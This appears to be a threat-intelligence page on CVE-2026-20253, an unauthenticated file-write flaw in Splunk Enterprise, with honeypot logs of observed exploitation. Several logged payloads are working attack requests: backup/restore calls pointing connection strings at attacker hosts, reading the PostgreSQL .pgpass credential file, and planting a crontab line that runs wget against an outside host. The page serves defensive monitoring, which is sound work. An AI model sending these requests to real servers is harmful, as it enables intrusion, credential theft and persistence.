KEVIntel
CVSS 9.8 Critical

CVE-2026-20253

PUBLISHED

Unauthenticated Arbitrary File Creation and Truncation in a PostgreSQL Sidecar Service Endpoint in Splunk Enterprise

Not yet in CISA KEV

Exploited in the wild · Active exploitation observed · PoC available · Remote · Low complexity · No user interaction · Unauthenticated

Vendor Splunk
Product Splunk Enterprise, Splunk Cloud Platform
Published Jun 10, 2026
EPSS 0.1% · 21% pctl

Description

In Splunk Enterprise versions below 10.2.4 and 10.0.7, and Splunk Cloud Platform versions below 10.4.2604.3 and 10.2.2510.14, an unauthenticated user could create or truncate arbitrary files through a PostgreSQL sidecar service endpoint. The vulnerability exists because the PostgreSQL sidecar service endpoint lacks authentication controls, allowing any network-reachable user to invoke file operations without credentials.

postgresql

Weaknesses (CWE)

  • Missing Authentication for Critical Function

CVSS Scores

CVSS v3.1 9.8 Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Exploitation Status

Exploited in the wild

Recorded 2026-06-15 05:15:25 UTC · KEVIntel

Active exploitation observed

Recorded 2026-06-15 05:15:25 UTC · KEVIntel sensor

Proof of concept available

Recorded 2026-06-12 10:04:32 UTC · GitHub

Observed Exploitation Attempts

Exploitation attempts against this vulnerability observed first-hand by KEVIntel private honeypots over the last 30 days.

High confidence · Active exploitation observed

Attempts Observed 55
Unique Attacker IPs 11
Attacker Countries 🇫🇷 🇭🇰 🇰🇷 🇸🇬 🇺🇸 🇻🇳
Sensors Observed 2

First observed 2026-06-15 05:15 UTC · Last observed 2026-06-15 16:25 UTC

Recent Attempts

Showing observations from the last 30 days.

Attack Time Attacker Sensor Request Confidence Raw Event
2026-06-15 11:53 UTC
Seen 24 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/__raw/v1/postgres/query
User-Agent Python-urllib/3.10
Payload fingerprint sha256:b48d5a01766d62ecc083c7d8d9be704d263447c8fa8c41886e8bc624fdf8d870
Payload {"database":"splunk","backupFile":"/tmp/x.bak"}
Source KEVIntel Honeypot
2026-06-15 11:53 UTC
Seen 24 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/__raw/v1/postgres/databases
User-Agent Python-urllib/3.10
Payload fingerprint sha256:a17dca32a4d0102f39218b4dfa78e7da898d3ec182eac8c3b8c3b4ee40497628
Payload {"database":"splunk","backupFile":"/tmp/x.bak"}
Source KEVIntel Honeypot
2026-06-15 11:52 UTC
Seen 24 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/__raw/v1/postgres/config
User-Agent Python-urllib/3.10
Payload fingerprint sha256:1c94b8e9afa8b2d4811931e93e97459fdc17584f202abbf64d558717e9ac1d9a
Payload {"database":"splunk","backupFile":"/tmp/x.bak"}
Source KEVIntel Honeypot
2026-06-15 11:52 UTC
Seen 24 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/status
User-Agent Python-urllib/3.10
Payload fingerprint sha256:190d64dae7e7996a265c3abdd3f3f31ee8754270e45640cd6d966f2f73485c80
Payload {"database":"splunk","backupFile":"/tmp/x.bak"}
Source KEVIntel Honeypot
2026-06-15 11:52 UTC
Seen 24 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent Python-urllib/3.10
Payload fingerprint sha256:7f2c6c5cc4c38c2ef5dc52b3b186aa26da3372a7ca168139286035f27f09f21b
Payload {"database":"splunk","backupFile":"/tmp/x.bak"}
Source KEVIntel Honeypot
2026-06-15 11:52 UTC
Seen 24 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent Python-urllib/3.10
Payload fingerprint sha256:3334d3289048149ccd73671526f58857fdf6f6b3cddd6b648d4bc8560a8f120f
Payload {"database":"splunk","backupFile":"/tmp/x.bak"}
Source KEVIntel Honeypot
2026-06-15 11:32 UTC
Seen 24 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/v1/postgres/recovery/backup
User-Agent Python-urllib/3.10
Payload fingerprint sha256:7831726b122264625b816d4099ff4c47438e640b78db871c02e7ac728532caa1
Payload {"database":"splunk","backupFile":"/tmp/pwned.bak"}
Source KEVIntel Honeypot
2026-06-15 11:32 UTC
Seen 24 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent Python-urllib/3.10
Payload fingerprint sha256:f4ca239c51b4408fec83ccfdee488d3426ed9ec286ec7c9ea1e0b8259300d3a9
Payload {"database":"splunk","backupFile":"/tmp/pwned.bak"}
Source KEVIntel Honeypot
2026-06-15 11:30 UTC
Seen 24 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent Python-urllib/3.10
Payload fingerprint sha256:e33d2664cd62bbd072fe10287e24ab4e422b320eab4bef192945df69a5fd31e6
Payload {"database": "splunk", "backupFile": "/tmp/pwned.bak"}
Source KEVIntel Honeypot
2026-06-15 10:52 UTC
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 107.172.77.101
🇺🇸 Elk Grove Village, Illinois, United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent CVE-2026-20253-Scanner/1.0
Payload fingerprint sha256:72c6626eedcdaf3914f429fce993f51cc4c0b2e3f2bc12335b353fd4584bbfb0
Payload {"database":"search_metadata","backupFile":"cve_2026_20253_probe"}
Source KEVIntel Honeypot
2026-06-15 10:00 UTC
Seen 4 times
Sensor 🇪🇺 FortiSandbox
Confidence High
Attacker 1.219.44.143
🇰🇷 Uijeongbu-si, Gyeonggi-do, South Korea
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Payload fingerprint sha256:dec05c441b8cf7ca0bd0a115e8eaba163e7f63abd6a9d35d09d09a365819800a
Payload {"database":"hostaddr=cenkimabon.dgrh3.cn","backupFile":"/tmp/poc"}
Source KEVIntel Honeypot
2026-06-15 09:57 UTC
Seen 4 times
Sensor 🇪🇺 FortiSandbox
Confidence High
Attacker 1.219.44.143
🇰🇷 Uijeongbu-si, Gyeonggi-do, South Korea
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Payload fingerprint sha256:dec05c441b8cf7ca0bd0a115e8eaba163e7f63abd6a9d35d09d09a365819800a
Payload {"database":"hostaddr=cenkimabon.dgrh3.cn","backupFile":"/tmp/poc"}
Source KEVIntel Honeypot
2026-06-15 09:54 UTC
Seen 4 times
Sensor 🇪🇺 FortiSandbox
Confidence High
Attacker 1.219.44.143
🇰🇷 Uijeongbu-si, Gyeonggi-do, South Korea
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Payload fingerprint sha256:c896e602bd1af5f512bb121ba4b24af17289a63a96b51368232f08f5b815b678
Payload {"database":"hostaddr=fwjagyhbcy.lfcx.eu.org","backupFile":"/tmp/poc"}
Source KEVIntel Honeypot
2026-06-15 09:49 UTC
Seen 4 times
Sensor 🇪🇺 FortiSandbox
Confidence High
Attacker 1.219.44.143
🇰🇷 Uijeongbu-si, Gyeonggi-do, South Korea
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Payload fingerprint sha256:56a449534964c4146fb05a9c7f0de1efb59031a3a40573bce0a8ade2e98332b5
Payload {"database":"search_metadata","backupFile":"backuptest"}
Source KEVIntel Honeypot
2026-06-15 08:36 UTC
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 38.54.30.224
🇻🇳 Hanoi, Hanoi, Vietnam
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent python-requests/2.25.1
Payload fingerprint sha256:5ca873c668139a4db6cf7deb1f833e34e37b89f32fdb04bad29d492e1d258023
Payload {"database": "search_metadata", "backupFile": "/tmp/cve_test"}
Source KEVIntel Honeypot
2026-06-15 07:12 UTC
Seen 11 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 45.198.224.26
🇺🇸 United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent python-requests/2.31.0
Payload fingerprint sha256:e0b9e66a806c7b596368a5489d44f04497bc2407cf082906cf4977d248b0313d
Payload {"database": "hostaddr=45.198.224.26 port=8443 dbname=pwn", "backupFile": "/tmp/.sp"}
Source KEVIntel Honeypot
2026-06-15 07:06 UTC
Seen 11 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 45.198.224.26
🇺🇸 United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent python-requests/2.31.0
Payload fingerprint sha256:d9fbe3f465f4d2c7e6943c67d9422707f0d146c68773809856ce3ce6e8de5d65
Payload {"database": "dbname=template1 passfile=/opt/splunk/var/packages/data/postgres/.pgpass", "backupFile": "/tmp/.sp"}
Source KEVIntel Honeypot
2026-06-15 07:06 UTC
Seen 11 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 45.198.224.26
🇺🇸 United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent python-requests/2.31.0
Payload fingerprint sha256:56732e51da8fc6cb5da1d23de28011ea93e7b279ff8b2bf8873964cf39c39f2b
Payload {"database": "hostaddr=45.198.224.26 dbname=pwn", "backupFile": "/tmp/.sp"}
Source KEVIntel Honeypot
2026-06-15 05:27 UTC
Seen 4 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 62.210.127.48
🇫🇷 Paris, Île-de-France, France
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent python-requests/2.34.0
Payload fingerprint sha256:524e442263ca9fab360fddd10ccf68f171eefb438024fd6a398233beadc12e96
Payload {"database": "search_metadata", "backupFile": "/var/spool/cron/crontabs/splunk"}
Source KEVIntel Honeypot
2026-06-15 05:27 UTC
Seen 4 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 62.210.127.48
🇫🇷 Paris, Île-de-France, France
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent python-requests/2.34.0
Payload fingerprint sha256:84a4437c3b6b64a0c8100fe8aef909bf9000103372582b5dc5e05277e7d09da6
Payload {"database": "search_metadata", "backupFile": "/var/spool/cron/crontabs/splunk"}
Source KEVIntel Honeypot
2026-06-15 05:24 UTC
Seen 11 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 45.198.224.26
🇺🇸 United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent python-requests/2.31.0
Payload fingerprint sha256:d9fbe3f465f4d2c7e6943c67d9422707f0d146c68773809856ce3ce6e8de5d65
Payload {"database": "dbname=template1 passfile=/opt/splunk/var/packages/data/postgres/.pgpass", "backupFile": "/tmp/.sp"}
Source KEVIntel Honeypot
2026-06-15 05:24 UTC
Seen 11 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 45.198.224.26
🇺🇸 United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent python-requests/2.31.0
Payload fingerprint sha256:56732e51da8fc6cb5da1d23de28011ea93e7b279ff8b2bf8873964cf39c39f2b
Payload {"database": "hostaddr=45.198.224.26 dbname=pwn", "backupFile": "/tmp/.sp"}
Source KEVIntel Honeypot
2026-06-15 05:20 UTC
Seen 4 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 62.210.127.48
🇫🇷 Paris, Île-de-France, France
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent python-requests/2.34.0
Payload fingerprint sha256:478a4118b648ba590fc44180931675fc5cb2d7891af4e9f7884bd27fa55074ea
Payload {"database": "search_metadata", "backupFile": "/var/spool/cron/crontabs/splunk", "passfile": "/opt/splunk/var/packages/data/postgres/.pgpass", "_raw": "* * * * * wget -O- thi9a5fw.requestrepo.com\n"}
Source KEVIntel Honeypot
2026-06-15 05:17 UTC
Seen 11 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 45.198.224.26
🇺🇸 United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent python-requests/2.31.0
Payload fingerprint sha256:164ff74fdc0fe2a04587e0ad0d3978a4718113d3c61d4677c4364ac08825a5bd
Payload {"database": "dbname=template1 passfile=/opt/splunk/var/packages/data/postgres/.pgpass", "backupFile": "/tmp/splunk_poc.dump"}
Source KEVIntel Honeypot
2026-06-15 05:17 UTC
Seen 11 times
Sensor 🇪🇺 Splunk Enterprise
Confidence High
Attacker 45.198.224.26
🇺🇸 United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent python-requests/2.31.0
Payload fingerprint sha256:2e2fc3251571fa5d5aedf5bb72cacaa788aea4aa50c851d201570d4dfb0222bf
Payload {"database": "hostaddr=45.198.224.26 dbname=pwn", "backupFile": "/tmp/splunk_poc.dump"}
Source KEVIntel Honeypot

Known Exploited Vulnerability Sources

Catalogues that list this CVE as a known exploited vulnerability.

Source Added
KEVIntel First 2026-06-15 05:15 UTC

Scanner Integrations

Recent Mentions

Critical Splunk Enterprise Flaw Lets Attackers Run Code Without Authentication

TheHackerNews · Jun 13, 2026

Splunk has released security updates to address a critical security flaw in Splunk Enterprise that could be exploited to conduct unauthenticated file operations and even remote code execution. The vulnerability, tracked as CVE-2026-20253, is rated 9.8 on the CVSS scoring system. "In Splunk Enterprise versions below 10.2.4 and 10.0.7, an unauthenticated user could create or truncate arbitrary

Why Use App-Level Auth When Every Database Has Auth? (Splunk Enterprise CVE-2026-20253 Pre-Auth RCE)

Watchtower Labs · Jun 12, 2026

Three posts? In three days? Are we insane? We're home alone, there's no one to stop us, and we're up past bedtime. So, we need to talk about Splunk. On June 10th, Splunk published this CVE-2026-20253 advisory: It has everything that we

Potential Proof of Concepts

These PoCs are unverified and could contain malware. Use at your own risk.

HORKimhab/CVE-2026-20253

github · Created 2026-06-14 04:18:18 UTC · 0 stars

CVE-2026-20253 - Draft

0xBlackash/CVE-2026-20253

github · Created 2026-06-13 18:09:32 UTC · 0 stars

CVE-2026-20253

watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253

github · Created 2026-06-12 10:04:32 UTC · 2 stars

Timeline

  • Added to KEVIntel

  • Detected by Nuclei

  • Proof of Concept Exploit Available

  • CVE Published to Public

  • CVE ID Reserved